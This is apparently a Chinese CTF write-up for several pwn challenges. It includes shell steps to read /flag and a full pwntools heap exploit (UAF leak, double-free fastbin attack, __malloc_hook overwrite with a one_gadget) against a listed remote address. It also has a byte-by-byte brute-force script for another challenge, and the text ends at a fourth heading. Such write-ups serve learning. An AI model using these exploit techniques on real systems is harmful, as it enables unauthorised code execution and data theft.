1.findyourself

  • 这题我也不知道是啥,好像是什么proc shell反正没听过,先记录下来再说。
  • Step1:ls -l /proc/self/cwd
  • Step2: $0
  • Step3: exec 1>&0
  • Step4: cat /flag

2.Roc826s_Note

  • 这题考察是heap题,本身难度不大,题目本身有个UAF漏洞,可以用来泄漏地址,然后可以用double free进行fastbin attack。exp直接放上。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
	io=remote('47.103.214.163',21002)
else:
	io=process('./Roc826')

def add(size,content):
	io.recvuntil('exit\n:')
	io.sendline('1')
	io.sendlineafter('size?\n',size)
	io.sendlineafter('content:',content)	
def dele(index):
	io.recvuntil('exit\n:')
	io.sendline('2')
	io.sendlineafter('index?\n',index)
def show(index):
	io.recvuntil('exit\n:')
	io.sendline('3')
	io.sendlineafter('index?\n',index)
def leak():
	io.recvuntil('exit\n:')
	add('144','aaaaa')#0
	add('144','wwww')#1
	dele('0')
	show('0')
	io.recvuntil(':')
	main_arena_leak=u64(io.recv(6).ljust(8,'\x00'))-88
	log.success('main_arena_leak==>{}'.format(hex(main_arena_leak)))
	dele('1')
	return main_arena_leak
def pwn(malloc_hook,payload):
	io.recvuntil('exit\n:')
	add('96','w')#2
	add('96','x')#3
	dele('2')
	dele('3')
	dele('2') 
	#7ff02b0c7000
	add('96',p64(fake_chunk))#2
	add('96','h')#3
	add('96','')#2
	add('96',payload)
	io.recvuntil('exit\n:')
	io.sendline('1')
	io.sendlineafter('size?\n','20')
	io.interactive()
if __name__ =='__main__':
	malloc_hook=0x3C4B10
	
	main_arena_leak=leak()
	libc_base=main_arena_leak-0x3C4B20
	log.success('libc_base==>{}'.format(hex(libc_base)))
	one_gadget=0xf1147+libc_base
	malloc_hook+=libc_base
	fake_chunk=malloc_hook-0x23
	payload ='a'*19
	payload+=p64(one_gadget)
	#gdb.attach(io,'b add')
	#pause()
	pwn(malloc_hook,payload)

3.Another_Heaven

  • 这题一开始我只注意到v5那边任意地址写1byte,然后我的思路是重写循环从而进行,任意地址写,然后打开gdb vmmap一下就傻了text段不可写,然后得到大佬的指点,最后用了爆破。晕~ 我这个爆破脚本可能写的不好,但是基本能跑出来,就是耗点时间,有兴趣的小伙伴可以加多线程来跑。
z#!/usr/bin/python
#coding:utf-8

from pwn import *
import os

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

flag_addr=0x602160
flag=''

	
def account(io,account):
	 io.sendlineafter('Account:',account)
	 
def write(io,addr):
	io.recvuntil('Annevi!\n')
	io.sendline(str(addr))
	io.send('\x00')
	
def guess(length):
	key='}?!_=|:"><+_)(*&^%$#@![];,./qwertyuiopsdfjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
	for i in range(41,length):
		try:
			for j in key:
					global flag
					os.system('clear')
					io=remote('47.103.214.163',21001)
					#io=process('./Another_Heaven')
					write(io,flag_addr+i+1)
					account(io,'E99p1ant')
					io.sendlineafter('Password:\n',flag+j)
					recv=io.recvline()
					if 'Welcome!' in recv:
						flag+=j
						log.success('The flag is :{}'.format(flag))
						break
					io.close()
		except:
			print 'except:'+str(i)
			io.close()
			exit(0)
	print flag
					
	
if __name__ =='__main__':
	guess(48)

4.形而上的坏死